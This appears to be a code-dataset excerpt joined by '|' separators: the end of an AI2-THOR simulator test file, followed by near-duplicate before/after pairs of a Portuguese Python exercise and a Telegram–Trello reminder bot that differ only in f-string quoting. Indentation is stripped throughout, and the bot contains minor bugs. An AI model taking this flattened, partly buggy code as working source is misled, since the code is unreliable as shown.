assert event.semantic_segmentation_frame.shape == (500, 500, 3)
event = fifo_controller.step(action="ChangeResolution", x=300, y=300)
assert event.depth_frame.shape == (300, 300)
assert event.instance_segmentation_frame.shape == (300, 300, 3)
assert event.semantic_segmentation_frame.shape == (300, 300, 3)
assert np.allclose(event.depth_frame, first_depth_frame, atol=0.001)
assert np.array_equal(event.instance_segmentation_frame, first_instance_frame)
assert np.array_equal(event.semantic_segmentation_frame, first_sem_frame)
assert first_event.color_to_object_id == event.color_to_object_id
assert first_event.object_id_to_color == event.object_id_to_color
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_change_resolution(controller):
event = controller.step(dict(action="Pass"), raise_for_failure=True)
assert event.frame.shape == (300, 300, 3)
event = controller.step(
dict(action="ChangeResolution", x=400, y=400), raise_for_failure=True
)
assert event.frame.shape == (400, 400, 3)
assert event.screen_width == 400
assert event.screen_height == 400
event = controller.step(
dict(action="ChangeResolution", x=300, y=300), raise_for_failure=True
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_teleport(controller):
# Checking y coordinate adjustment works
controller.step(
"TeleportFull", **{**BASE_FP28_LOCATION, "y": 0.95}, raise_for_failure=True
)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, BASE_FP28_POSITION)
controller.step(
"TeleportFull",
**{**BASE_FP28_LOCATION, "x": -2.0, "z": -2.5, "y": 0.95},
raise_for_failure=True,
)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-2.0, z=-2.5, y=0.901))
# Teleporting too high
before_position = controller.last_event.metadata["agent"]["position"]
controller.step(
"Teleport", **{**BASE_FP28_LOCATION, "y": 1.0},
)
assert not controller.last_event.metadata[
"lastActionSuccess"
], "Teleport should not allow changes for more than 0.05 in the y coordinate."
assert (
controller.last_event.metadata["agent"]["position"] == before_position
), "After failed teleport, the agent's position should not change."
# Teleporting into an object
controller.step(
"Teleport", **{**BASE_FP28_LOCATION, "z": -3.5},
)
assert not controller.last_event.metadata[
"lastActionSuccess"
], "Should not be able to teleport into an object."
# Teleporting into a wall
controller.step(
"Teleport", **{**BASE_FP28_LOCATION, "z": 0},
)
assert not controller.last_event.metadata[
"lastActionSuccess"
], "Should not be able to teleport into a wall."
# DEFAULT AGENT TEST
# make sure Teleport works with default args
a1 = controller.last_event.metadata["agent"]
a2 = controller.step("Teleport", horizon=10).metadata["agent"]
assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"
# all should be the same except for horizon
assert_near(a1["position"], a2["position"])
assert_near(a1["rotation"], a2["rotation"])
assert (
a1["isStanding"] == a2["isStanding"]
), "Agent should remain in same standing when unspecified!"
assert a1["isStanding"] != None, "Agent isStanding should be set for physics agent!"
# make sure float rotation works
# TODO: readd this when it actually works
# agent = controller.step('TeleportFull', rotation=25).metadata['agent']
# assert_near(agent['rotation']['y'], 25)
# test out of bounds with default agent
for action in ["Teleport", "TeleportFull"]:
try:
controller.step(
action="TeleportFull",
position=dict(x=2000, y=0, z=9000),
rotation=dict(x=0, y=90, z=0),
horizon=30,
raise_for_failure=True,
)
assert False, "Out of bounds teleport not caught by physics agent"
except:
pass
# Teleporting with the locobot and drone, which don't support standing
for agent in ["locobot", "drone"]:
event = controller.reset(agentMode=agent)
assert event.metadata["agent"]["isStanding"] is None, agent + " cannot stand!"
# Only degrees of freedom on the locobot
for action in ["Teleport", "TeleportFull"]:
event = controller.step(
action=action,
position=dict(x=-1.5, y=0.9, z=-1.5),
rotation=dict(x=0, y=90, z=0),
horizon=30,
)
assert event.metadata["lastActionSuccess"], (
agent + " must be able to TeleportFull without passing in standing!"
)
try:
event = controller.step(
action=action,
position=dict(x=-1.5, y=0.9, z=-1.5),
rotation=dict(x=0, y=90, z=0),
horizon=30,
standing=True,
)
assert False, (
agent + " should not be able to pass in standing to teleport!"
)
except:
pass
# test out of bounds with default agent
try:
controller.step(
action=action,
position=dict(x=2000, y=0, z=9000),
rotation=dict(x=0, y=90, z=0),
horizon=30,
raise_for_failure=True,
)
assert False, "Out of bounds teleport not caught by physics agent"
except:
pass
# make sure Teleport works with default args
a1 = controller.last_event.metadata["agent"]
a2 = controller.step("Teleport", horizon=10).metadata["agent"]
assert abs(a2["cameraHorizon"] - 10) < 1e-2, "cameraHorizon should be ~10!"
# all should be the same except for horizon
assert_near(a1["position"], a2["position"])
assert_near(a1["rotation"], a2["rotation"])
# TODO: readd this when it actually works.
# make sure float rotation works
# if agent == "locobot":
# agent = controller.step('TeleportFull', rotation=25).metadata['agent']
# assert_near(agent['rotation']['y'], 25)
controller.reset(agentMode="default")
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_interactable_poses(controller):
fridgeId = next(
obj["objectId"]
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
event = controller.step("GetInteractablePoses", objectId=fridgeId)
poses = event.metadata["actionReturn"]
assert (
600 > len(poses) > 400
), "Should have around 400 interactable poses next to the fridge!"
# teleport to a random pose
pose = poses[len(poses) // 2]
event = controller.step("TeleportFull", **pose)
# assumes 1 fridge in the scene
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["visible"], "Object is not interactable!"
# tests that teleport correctly works with **syntax
assert (
abs(pose["x"] - event.metadata["agent"]["position"]["x"]) < 1e-3
), "Agent x position off!"
assert (
abs(pose["z"] - event.metadata["agent"]["position"]["z"]) < 1e-3
), "Agent z position off!"
assert (
abs(pose["rotation"] - event.metadata["agent"]["rotation"]["y"]) < 1e-3
), "Agent rotation off!"
assert (
abs(pose["horizon"] - event.metadata["agent"]["cameraHorizon"]) < 1e-3
), "Agent horizon off!"
assert (
pose["standing"] == event.metadata["agent"]["isStanding"]
), "Agent's isStanding is off!"
# potato should be inside of the fridge (and, thus, non interactable)
potatoId = next(
obj["objectId"]
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Potato"
)
event = controller.step("GetInteractablePoses", objectId=potatoId)
assert (
len(event.metadata["actionReturn"]) == 0
), "Potato is inside of fridge, and thus, shouldn't be interactable"
assert event.metadata[
"lastActionSuccess"
], "GetInteractablePoses with Potato shouldn't have failed!"
# assertion for maxPoses
event = controller.step("GetInteractablePoses", objectId=fridgeId, maxPoses=50)
assert len(event.metadata["actionReturn"]) == 50, "maxPoses should be capped at 50!"
# assert only checking certain horizons and rotations is working correctly
horizons = [0, 30]
rotations = [0, 45]
event = controller.step(
"GetInteractablePoses",
objectId=fridgeId,
horizons=horizons,
rotations=rotations,
)
for pose in event.metadata["actionReturn"]:
horizon_works = False
for horizon in horizons:
if abs(pose["horizon"] - horizon) < 1e-3:
horizon_works = True
break
assert horizon_works, "Not expecting horizon: " + pose["horizon"]
rotation_works = False
for rotation in rotations:
if abs(pose["rotation"] - rotation) < 1e-3:
rotation_works = True
break
assert rotation_works, "Not expecting rotation: " + pose["rotation"]
# assert only checking certain horizons and rotations is working correctly
event = controller.step("GetInteractablePoses", objectId=fridgeId, rotations=[270])
assert (
len(event.metadata["actionReturn"]) == 0
), "Fridge shouldn't be viewable from this rotation!"
assert event.metadata[
"lastActionSuccess"
], "GetInteractablePoses with Fridge shouldn't have failed!"
# test maxDistance
event = controller.step("GetInteractablePoses", objectId=fridgeId, maxDistance=5)
assert (
1300 > len(event.metadata["actionReturn"]) > 1100
), "GetInteractablePoses with large maxDistance is off!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_2d_semantic_hulls(controller):
from shapely.geometry import Polygon
controller.reset("FloorPlan28")
obj_name_to_obj_id = {
o["name"]: o["objectId"] for o in controller.last_event.metadata["objects"]
}
# Used to save fixed object locations.
# with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "w") as f:
# json.dump(
# [
# {k: o[k] for k in ["name", "position", "rotation"]}
# for o in controller.last_event.metadata["objects"]
# ],
# f
# )
with open("ai2thor/tests/data/floorplan28-fixed-obj-poses.json", "r") as f:
fixed_obj_poses = json.load(f)
for o in fixed_obj_poses:
teleport_success = controller.step(
"TeleportObject",
objectId=obj_name_to_obj_id[o["name"]],
position=o["position"],
rotation=o["rotation"],
forceAction=True,
forceKinematic=True,
makeUnbreakable=True,
).metadata["lastActionSuccess"]
assert teleport_success
object_types = ["Tomato", "Drawer", "Fridge"]
object_ids = [
"Mug|-03.15|+00.82|-03.47",
"Faucet|-00.39|+00.93|-03.61",
"StoveBurner|-00.22|+00.92|-01.85",
]
def get_rounded_hulls(**kwargs):
if "objectId" in kwargs:
md = controller.step("Get2DSemanticHull", **kwargs).metadata
else:
md = controller.step("Get2DSemanticHulls", **kwargs).metadata
assert md["lastActionSuccess"] and md["errorMessage"] == ""
hulls = md["actionReturn"]
if isinstance(hulls, list):
return np.array(hulls, dtype=float).round(4).tolist()
else:
return {
k: np.array(v, dtype=float).round(4).tolist()
for k, v in md["actionReturn"].items()
}
# All objects
hulls_all = get_rounded_hulls()
# Filtering by object types
hulls_type_filtered = get_rounded_hulls(objectTypes=object_types)
# Filtering by object ids
hulls_id_filtered = get_rounded_hulls(objectIds=object_ids)
# Single object id
hulls_single_object = get_rounded_hulls(objectId=object_ids[0])
# Used to save the ground truth values:
# objects = controller.last_event.metadata["objects"]
# objects_poses = [
# {"objectName": o["name"], "position": o["position"], "rotation": o["rotation"]} for o in objects
# ]
# print(controller.step("SetObjectPoses", objectPoses=objects_poses).metadata)
# with open("ai2thor/tests/data/semantic-2d-hulls.json", "w") as f:
# json.dump(
# {
# "all": hulls_all,
# "type_filtered": hulls_type_filtered,
# "id_filtered": hulls_id_filtered,
# "single_object": hulls_single_object,
# },
# f
# )
with open("ai2thor/tests/data/semantic-2d-hulls.json") as f:
truth = json.load(f)
def assert_almost_equal(a, b):
if isinstance(a, list):
pa = Polygon(a)
pb = Polygon(b)
pa_area = pa.area
pb_area = pb.area
sym_diff_area = pa.symmetric_difference(pb).area
# TODO: There seems to be a difference in the geometry reported by Unity when in
# Linux vs Mac. I've had to increase the below check to the relatively generous <0.02
# to get this test to pass.
assert sym_diff_area / max([1e-6, pa_area, pb_area]) < 2e-2, (
f"Polygons have to large an area ({sym_diff_area}) in their symmetric difference"
f" compared to their sizes ({pa_area}, {pb_area}). Hulls:\n"
f"{json.dumps(a)}\n"
f"{json.dumps(b)}\n"
)
else:
for k in set(a.keys()) | set(b.keys()):
try:
assert_almost_equal(a[k], b[k])
except AssertionError as e:
raise AssertionError(f"For {k}: {e.args[0]}")
assert_almost_equal(truth["all"], hulls_all)
assert_almost_equal(truth["type_filtered"], hulls_type_filtered)
assert_almost_equal(truth["id_filtered"], hulls_id_filtered)
assert_almost_equal(truth["single_object"], hulls_single_object)
# Should fail when given types and ids
assert not controller.step(
"Get2DSemanticHulls", objectTypes=object_types, objectIds=object_ids
).metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
@pytest.mark.skip(reason="Colliders need to be moved closer to objects.")
def test_get_object_in_frame(controller):
controller.reset(scene=TEST_SCENE, agentMode="default")
event = controller.step(
action="TeleportFull",
position=dict(x=-1, y=0.900998235, z=-1.25),
rotation=dict(x=0, y=90, z=0),
horizon=0,
standing=True,
)
assert event, "TeleportFull should have succeeded!"
query = controller.step("GetObjectInFrame", x=0.6, y=0.6)
assert not query, "x=0.6, y=0.6 should fail!"
query = controller.step("GetObjectInFrame", x=0.6, y=0.4)
assert query.metadata["actionReturn"].startswith(
"Cabinet"
), "x=0.6, y=0.4 should have a cabinet!"
query = controller.step("GetObjectInFrame", x=0.3, y=0.5)
assert query.metadata["actionReturn"].startswith(
"Fridge"
), "x=0.3, y=0.5 should have a fridge!"
event = controller.reset(renderInstanceSegmentation=True)
assert event.metadata["screenHeight"] == 300
assert event.metadata["screenWidth"] == 300
# exhaustive test
num_tested = 0
for objectId in event.instance_masks.keys():
for obj in event.metadata["objects"]:
if obj["objectId"] == objectId:
break
else:
# object may not be a sim object (e.g., ceiling, floor, wall, etc.)
continue
num_tested += 1
mask = event.instance_masks[objectId]
# subtract 3 pixels off the edge due to pixels being rounded and collider issues
mask = Image.fromarray(mask)
for _ in range(3):
mask_edges = mask.filter(ImageFilter.FIND_EDGES)
mask = ImageChops.subtract(mask, mask_edges)
mask = np.array(mask)
ys, xs = mask.nonzero()
for x, y in zip(xs, ys):
event = controller.step(
action="GetObjectInFrame", x=x / 300, y=y / 300, forceAction=True
)
assert (
event.metadata["actionReturn"] == objectId
), f"Failed at ({x / 300}, {y / 300}) for {objectId} with agent at: {event.metadata['agent']}"
assert (
num_tested == 29
), "There should be 29 objects in the frame, based on the agent's pose!"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_coordinate_from_raycast(controller):
controller.reset(scene="FloorPlan28")
event = controller.step(
action="TeleportFull",
position=dict(x=-1.5, y=0.900998235, z=-1.5),
rotation=dict(x=0, y=90, z=0),
horizon=0,
standing=True,
)
assert event, "TeleportFull should have succeeded!"
for x, y in [(1.5, 0.5), (1.1, 0.3), (-0.1, 0.8), (-0.5, -0.3)]:
query = controller.step("GetCoordinateFromRaycast", x=x, y=y)
assert not query, f"x={x}, y={y} should fail!"
query = controller.step("GetCoordinateFromRaycast", x=0.5, y=0.5)
assert_near(
query.metadata["actionReturn"],
{"x": -0.344259053, "y": 1.57599819, "z": -1.49999917},
)
query = controller.step("GetCoordinateFromRaycast", x=0.5, y=0.2)
assert_near(
query.metadata["actionReturn"],
{"x": -0.344259053, "y": 2.2694428, "z": -1.49999917},
)
query = controller.step("GetCoordinateFromRaycast", x=0.25, y=0.5)
assert_near(
query.metadata["actionReturn"],
{"x": -0.5968407392501831, "y": 1.5759981870651245, "z": -1.0484200716018677},
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions_with_directions_relative_agent(controller):
controller.reset("FloorPlan28")
event = controller.step("GetReachablePositions")
num_reachable_aligned = len(event.metadata["actionReturn"])
assert 100 < num_reachable_aligned < 125
controller.step(
action="TeleportFull",
position=dict(x=-1, y=0.900998235, z=-1.25),
rotation=dict(x=0, y=49.11111, z=0),
horizon=0,
standing=True,
)
event = controller.step("GetReachablePositions")
num_reachable_aligned_after_teleport = len(event.metadata["actionReturn"])
assert num_reachable_aligned == num_reachable_aligned_after_teleport
event = controller.step("GetReachablePositions", directionsRelativeAgent=True)
num_reachable_unaligned = len(event.metadata["actionReturn"])
assert 100 < num_reachable_unaligned < 125
assert (
num_reachable_unaligned != num_reachable_aligned
), "Number of reachable positions should differ when using `directionsRelativeAgent`"
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_move(controller):
event = controller.reset(scene="FloorPlan28", agentMode="arm")
assert_near(
point1={"x": -1.5, "y": 0.9009982347488403, "z": -1.5},
point2=event.metadata["agent"]["position"],
)
event = controller.step(action="MoveAgent", ahead=0.25, right=0.15)
assert_near(
point1={"x": -1.649999976158142, "y": 0.9009982347488403, "z": -1.75},
point2=event.metadata["agent"]["position"],
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_rotate(controller):
event = controller.reset(scene="FloorPlan28", agentMode="arm")
assert_near(
point1={"x": -0.0, "y": 180.0, "z": 0.0},
point2=event.metadata["agent"]["rotation"],
)
event = controller.step(action="RotateAgent", degrees=60)
assert_near(
point1={"x": -0.0, "y": 240.0, "z": 0.0},
point2=event.metadata["agent"]["rotation"],
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_unsupported_manipulathor(controller):
controller.reset(agentMode="arm")
unsupported_actions = [
"MoveAhead",
"MoveBack",
"MoveLeft",
"MoveRight",
"RotateRight",
"RotateLeft",
]
for action in unsupported_actions:
event = controller.step(action)
assert not event, action + " should have failed with agentMode=arm"
event = controller.step(action="PickupObject", x=0.5, y=0.5)
assert not event, "PickupObject(x, y) should have failed with agentMode=arm"
objectId = next(
obj["objectId"] for obj in event.metadata["objects"] if obj["pickupable"]
)
event = controller.step(action="PickupObject", objectId=objectId, forceAction=True)
assert not event, "PickupObject(objectId) should have failed with agentMode=arm"
|
galera = []
pessoa = {}
soma = media = 0
while True:
pessoa.clear()
pessoa['nome'] = str(input('Nome: '))
while True:
pessoa['sexo'] = str(input('Sexo: [M/F] ')).upper()[0]
if pessoa['sexo'] in 'MF':
break
print('ERRO. Digite apenas "M" ou "F".')
pessoa['idade'] = int(input('Idade: '))
soma += pessoa['idade']
galera.append(pessoa.copy())
while True:
esc = str(input('Deseja continuar? [S/N] ')).upper()[0]
if esc in 'SN':
break
print('ERRO. Digite apenas "S" ou "N".')
if esc == 'N':
break
print('-='*21)
print(f'A) Ao todo temos {len(galera)} de pessoas cadastradas.')
media = soma / len(galera)
print(f'B) A média de idades das pessoas é de {media:5.2f}.')
print('C) As mulheres cadastradas foram: ', end = '')
for p in galera:
if p['sexo'] in 'F':
print(f'{p['nome']}', end = ' ')
print()
print('D) As pessoas acima da média de idade são: ')
for p in galera:
if p['idade'] >= media:
print(' ', end = '')
for k,v in p.items():
print(f'{k} = {v}: ', end = '')
print()
print('<<<<<<< ENCERRANDO >>>>>>>') | galera = []
pessoa = {}
soma = media = 0
while True:
pessoa.clear()
pessoa['nome'] = str(input('Nome: '))
while True:
pessoa['sexo'] = str(input('Sexo: [M/F] ')).upper()[0]
if pessoa['sexo'] in 'MF':
break
print('ERRO. Digite apenas "M" ou "F".')
pessoa['idade'] = int(input('Idade: '))
soma += pessoa['idade']
galera.append(pessoa.copy())
while True:
esc = str(input('Deseja continuar? [S/N] ')).upper()[0]
if esc in 'SN':
break
print('ERRO. Digite apenas "S" ou "N".')
if esc == 'N':
break
print('-='*21)
print(f'A) Ao todo temos {len(galera)} de pessoas cadastradas.')
media = soma / len(galera)
print(f'B) A média de idades das pessoas é de {media:5.2f}.')
print('C) As mulheres cadastradas foram: ', end = '')
for p in galera:
if p['sexo'] in 'F':
print(f'{p["nome"]}', end = ' ')
print()
print('D) As pessoas acima da média de idade são: ')
for p in galera:
if p['idade'] >= media:
print(' ', end = '')
for k,v in p.items():
print(f'{k} = {v}: ', end = '')
print()
print('<<<<<<< ENCERRANDO >>>>>>>') |
import json
import time
import datetime
from enum import Enum
from itertools import chain
from threading import Thread
from typing import List, Iterator, Optional
import telegram
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext import (CallbackQueryHandler, ConversationHandler,
CommandHandler)
from telegram import ext as tg_ext
import schedule
from trello import TrelloClient, Card
class State(Enum):
CHOOSING_BOARD = 0
CHOOSING_LIST = 1
class TelegramBot:
_bot: telegram.Bot
_uppdater: tg_ext.Updater
_owner_id: str
_trello_client: TrelloClient
_notify_time_list: List[str]
def __init__(self, config: dict):
self._bot = telegram.Bot(config['telegram']['bot_token'])
self._updater = tg_ext.Updater(config['telegram']['bot_token'])
self._owner_id = config['telegram']['owner_chat_id']
self._trello_client = TrelloClient(**config['trello_api_keys'])
self._notify_time_list = config['notification_times']
self._set_up_notification_schedule(self._notify_time_list)
self._add_handlers()
def _add_handlers(self) -> State:
dispatcher = self._updater.dispatcher
conversation_handler = ConversationHandler(
entry_points=[CommandHandler('add', self._handle_add)],
states={
State.CHOOSING_BOARD: [CallbackQueryHandler(self._handle_choose_board)],
State.CHOOSING_LIST: [CallbackQueryHandler(self._handle_choose_list)]
},
fallbacks=[CommandHandler('cancel', self._handle_cancel)]
)
dispatcher.add_handler(conversation_handler)
dispatcher.add_handler(CallbackQueryHandler(self._handle_callback_query))
def _handle_cancel(self, update: telegram.Update, context: tg_ext.CallbackContext):
self._bot.send_message(update.message.chat_id, 'Canceled')
return ConversationHandler.END
def _handle_add(self, update: telegram.Update, context: tg_ext.CallbackContext):
"""command must have form /add dd.mm.yyyy Description"""
chat_id = update.message.chat_id
if len(context.args) < 2:
self._bot.send_message(chat_id, 'Your message must include date and name')
return ConversationHandler.END
date = context.args[0]
date = to_date_if_correct(date)
if date is None:
self._bot.send_message(chat_id, 'Incorrect date')
return ConversationHandler.END
card_name = ''.join(context.args[1:])
context.user_data['date'] = date
context.user_data['card-name'] = card_name
boards = self._trello_client.list_boards()
reply_button_rows = []
for board in boards:
callback_data = self._prepare_callback_data(act='choose-add-board', data=board.id)
reply_button_rows.append([InlineKeyboardButton(board.name, callback_data=callback_data)])
reply_markup = InlineKeyboardMarkup(reply_button_rows)
self._bot.send_message(chat_id=chat_id,
text='Choose board',
reply_markup=reply_markup)
return State.CHOOSING_BOARD
def _handle_choose_board(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
query.answer()
if act != 'choose-add-board':
self._bot.send_message('Finish or /cancle adding new car before doing something else')
return
board_id = act_data
reply_keyboard = self._gen_choose_list_inline_keyboard(board_id)
query.edit_message_text('Choose list')
query.edit_message_reply_markup(reply_markup=reply_keyboard)
return State.CHOOSING_LIST
def _gen_choose_list_inline_keyboard(self, board_id: str) -> InlineKeyboardMarkup:
board = self._trello_client.get_board(board_id)
board_lists = board.all_lists()
reply_button_rows = []
for board_list in board_lists:
callback_data = self._prepare_callback_data(act='choose-add-list', data=board_list.id)
reply_button_rows.append([InlineKeyboardButton(board_list.name, callback_data=callback_data)])
return InlineKeyboardMarkup(reply_button_rows)
def _handle_choose_list(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
if act != 'choose-add-list':
self._bot.send_message('Finish or cancle adding new car before doing something else')
return
query.answer()
query.edit_message_reply_markup(reply_markup=None)
list_id = act_data
user_data = context.user_data
trello_list = self._trello_client.get_list(list_id)
card_due_date = user_data['date'].isoformat()
card_name = user_data['card-name']
trello_list.add_card(card_name, due=card_due_date)
query.edit_message_text('Done ✅')
return ConversationHandler.END
def _prepare_callback_data(self, act: str, data: str) -> str:
"""
combined length of callback_data must be <= 64 bytes
json dict takes 21 simbol, so 43 lefts for act and data
"""
callback_data = json.dumps({'act': act, 'data': data})
if len(callback_data) > 64:
raise Exception(f'United length of act and data is too big ({len(callback_data)}). ' +\
'For more info watch method)')
return callback_data
def _unpack_callback_data(self, query: telegram.CallbackQuery) -> tuple[str, str]:
callback_data = json.loads(query.data)
act = callback_data['act']
act_data = callback_data['data']
return (act, act_data)
def start(self):
self._start_notifing()
self._start_handling_messages()
def _start_notifing(self):
def run_scheduler():
import threading
while True:
schedule.run_pending()
time.sleep(1)
thread = Thread(target=run_scheduler, daemon=True)
thread.start()
def _start_handling_messages(self):
self._updater.start_polling()
self._updater.idle()
def _set_up_notification_schedule(self, notification_times: List[str]):
for time in notification_times:
schedule.every().day.at(time).do(self._send_messages_with_unfinished_cards)
def _handle_callback_query(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
if act != 'mark-finished':
self._bot.send_message(query.message.chat_id, 'Unavalible command now')
return
query.answer()
card_id = act_data
card = self._trello_client.get_card(card_id)
card.set_due_complete()
new_message_text = query.message.text + '\nDone ✅'
query.edit_message_text(new_message_text)
def _send_messages_with_unfinished_cards(self):
cards = self._get_due_today_cards()
for card in cards:
msg_text = TelegramBot.card_obj_to_message_text(card)
callback_data = self._prepare_callback_data(act='mark-finished', data=card.id)
reply_markup = InlineKeyboardMarkup(
[[InlineKeyboardButton('Finished', callback_data=callback_data)]])
self._bot.send_message(text=msg_text,
chat_id=self._owner_id,
reply_markup=reply_markup)
def _get_due_today_cards(self) -> List[str]:
"""
returns string card representations,
what have due date today or earlier and isn't closed
"""
boards = self._trello_client.list_boards()
cards = flatten(map(lambda board: board.open_cards(), boards))
cards = filter(lambda card: card.due is not None, cards)
cards = filter(lambda card: not card.is_due_complete , cards)
date_today = datetime.date.today()
cards = filter(lambda card: card.due_date.date() <= date_today,
cards)
return list(cards)
def card_obj_to_message_text(card: Card) -> str:
return (f'{card.due_date.strftime('%m.%d')}\n' +
f'{card.name}\n')
def flatten(src) -> Iterator:
"""flatten iterable of iterables"""
return chain.from_iterable(src)
def to_date_if_correct(date: str) -> Optional[datetime.datetime]:
try:
day, month, year = date.split('.')
date = datetime.datetime(int(year), int(month), int(day))
except ValueError:
return None
return date | import json
import time
import datetime
from enum import Enum
from itertools import chain
from threading import Thread
from typing import List, Iterator, Optional
import telegram
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext import (CallbackQueryHandler, ConversationHandler,
CommandHandler)
from telegram import ext as tg_ext
import schedule
from trello import TrelloClient, Card
class State(Enum):
CHOOSING_BOARD = 0
CHOOSING_LIST = 1
class TelegramBot:
_bot: telegram.Bot
_uppdater: tg_ext.Updater
_owner_id: str
_trello_client: TrelloClient
_notify_time_list: List[str]
def __init__(self, config: dict):
self._bot = telegram.Bot(config['telegram']['bot_token'])
self._updater = tg_ext.Updater(config['telegram']['bot_token'])
self._owner_id = config['telegram']['owner_chat_id']
self._trello_client = TrelloClient(**config['trello_api_keys'])
self._notify_time_list = config['notification_times']
self._set_up_notification_schedule(self._notify_time_list)
self._add_handlers()
def _add_handlers(self) -> State:
dispatcher = self._updater.dispatcher
conversation_handler = ConversationHandler(
entry_points=[CommandHandler('add', self._handle_add)],
states={
State.CHOOSING_BOARD: [CallbackQueryHandler(self._handle_choose_board)],
State.CHOOSING_LIST: [CallbackQueryHandler(self._handle_choose_list)]
},
fallbacks=[CommandHandler('cancel', self._handle_cancel)]
)
dispatcher.add_handler(conversation_handler)
dispatcher.add_handler(CallbackQueryHandler(self._handle_callback_query))
def _handle_cancel(self, update: telegram.Update, context: tg_ext.CallbackContext):
self._bot.send_message(update.message.chat_id, 'Canceled')
return ConversationHandler.END
def _handle_add(self, update: telegram.Update, context: tg_ext.CallbackContext):
"""command must have form /add dd.mm.yyyy Description"""
chat_id = update.message.chat_id
if len(context.args) < 2:
self._bot.send_message(chat_id, 'Your message must include date and name')
return ConversationHandler.END
date = context.args[0]
date = to_date_if_correct(date)
if date is None:
self._bot.send_message(chat_id, 'Incorrect date')
return ConversationHandler.END
card_name = ''.join(context.args[1:])
context.user_data['date'] = date
context.user_data['card-name'] = card_name
boards = self._trello_client.list_boards()
reply_button_rows = []
for board in boards:
callback_data = self._prepare_callback_data(act='choose-add-board', data=board.id)
reply_button_rows.append([InlineKeyboardButton(board.name, callback_data=callback_data)])
reply_markup = InlineKeyboardMarkup(reply_button_rows)
self._bot.send_message(chat_id=chat_id,
text='Choose board',
reply_markup=reply_markup)
return State.CHOOSING_BOARD
def _handle_choose_board(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
query.answer()
if act != 'choose-add-board':
self._bot.send_message('Finish or /cancle adding new car before doing something else')
return
board_id = act_data
reply_keyboard = self._gen_choose_list_inline_keyboard(board_id)
query.edit_message_text('Choose list')
query.edit_message_reply_markup(reply_markup=reply_keyboard)
return State.CHOOSING_LIST
def _gen_choose_list_inline_keyboard(self, board_id: str) -> InlineKeyboardMarkup:
board = self._trello_client.get_board(board_id)
board_lists = board.all_lists()
reply_button_rows = []
for board_list in board_lists:
callback_data = self._prepare_callback_data(act='choose-add-list', data=board_list.id)
reply_button_rows.append([InlineKeyboardButton(board_list.name, callback_data=callback_data)])
return InlineKeyboardMarkup(reply_button_rows)
def _handle_choose_list(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
if act != 'choose-add-list':
self._bot.send_message('Finish or cancle adding new car before doing something else')
return
query.answer()
query.edit_message_reply_markup(reply_markup=None)
list_id = act_data
user_data = context.user_data
trello_list = self._trello_client.get_list(list_id)
card_due_date = user_data['date'].isoformat()
card_name = user_data['card-name']
trello_list.add_card(card_name, due=card_due_date)
query.edit_message_text('Done ✅')
return ConversationHandler.END
def _prepare_callback_data(self, act: str, data: str) -> str:
"""
combined length of callback_data must be <= 64 bytes
json dict takes 21 simbol, so 43 lefts for act and data
"""
callback_data = json.dumps({'act': act, 'data': data})
if len(callback_data) > 64:
raise Exception(f'United length of act and data is too big ({len(callback_data)}). ' +\
'For more info watch method)')
return callback_data
def _unpack_callback_data(self, query: telegram.CallbackQuery) -> tuple[str, str]:
callback_data = json.loads(query.data)
act = callback_data['act']
act_data = callback_data['data']
return (act, act_data)
def start(self):
self._start_notifing()
self._start_handling_messages()
def _start_notifing(self):
def run_scheduler():
import threading
while True:
schedule.run_pending()
time.sleep(1)
thread = Thread(target=run_scheduler, daemon=True)
thread.start()
def _start_handling_messages(self):
self._updater.start_polling()
self._updater.idle()
def _set_up_notification_schedule(self, notification_times: List[str]):
for time in notification_times:
schedule.every().day.at(time).do(self._send_messages_with_unfinished_cards)
def _handle_callback_query(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
if act != 'mark-finished':
self._bot.send_message(query.message.chat_id, 'Unavalible command now')
return
query.answer()
card_id = act_data
card = self._trello_client.get_card(card_id)
card.set_due_complete()
new_message_text = query.message.text + '\nDone ✅'
query.edit_message_text(new_message_text)
def _send_messages_with_unfinished_cards(self):
cards = self._get_due_today_cards()
for card in cards:
msg_text = TelegramBot.card_obj_to_message_text(card)
callback_data = self._prepare_callback_data(act='mark-finished', data=card.id)
reply_markup = InlineKeyboardMarkup(
[[InlineKeyboardButton('Finished', callback_data=callback_data)]])
self._bot.send_message(text=msg_text,
chat_id=self._owner_id,
reply_markup=reply_markup)
def _get_due_today_cards(self) -> List[str]:
"""
returns string card representations,
what have due date today or earlier and isn't closed
"""
boards = self._trello_client.list_boards()
cards = flatten(map(lambda board: board.open_cards(), boards))
cards = filter(lambda card: card.due is not None, cards)
cards = filter(lambda card: not card.is_due_complete , cards)
date_today = datetime.date.today()
cards = filter(lambda card: card.due_date.date() <= date_today,
cards)
return list(cards)
def card_obj_to_message_text(card: Card) -> str:
return (f'{card.due_date.strftime("%m.%d")}\n' +
f'{card.name}\n')
